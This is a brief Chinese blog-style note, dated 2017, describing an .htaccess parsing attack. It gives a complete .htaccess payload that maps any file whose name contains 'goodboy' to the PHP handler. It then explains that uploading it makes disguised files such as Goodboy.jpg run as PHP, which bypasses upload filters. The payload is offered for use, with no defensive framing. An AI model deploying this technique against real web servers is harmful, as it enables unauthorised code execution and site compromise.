htaccess 文件解析攻击

建一个.htaccess 文件,里面的内容如下

<FilesMatch "goodboy">

SetHandler application/x-httpd-php

</FilesMatch>

 

上传到目录然后目录里含有goodboy字符串的文件都被当作PHP文件解析

例如上传Goodboy.jpg  goodboy 无后缀名也可以



2017-05-09  /   

评论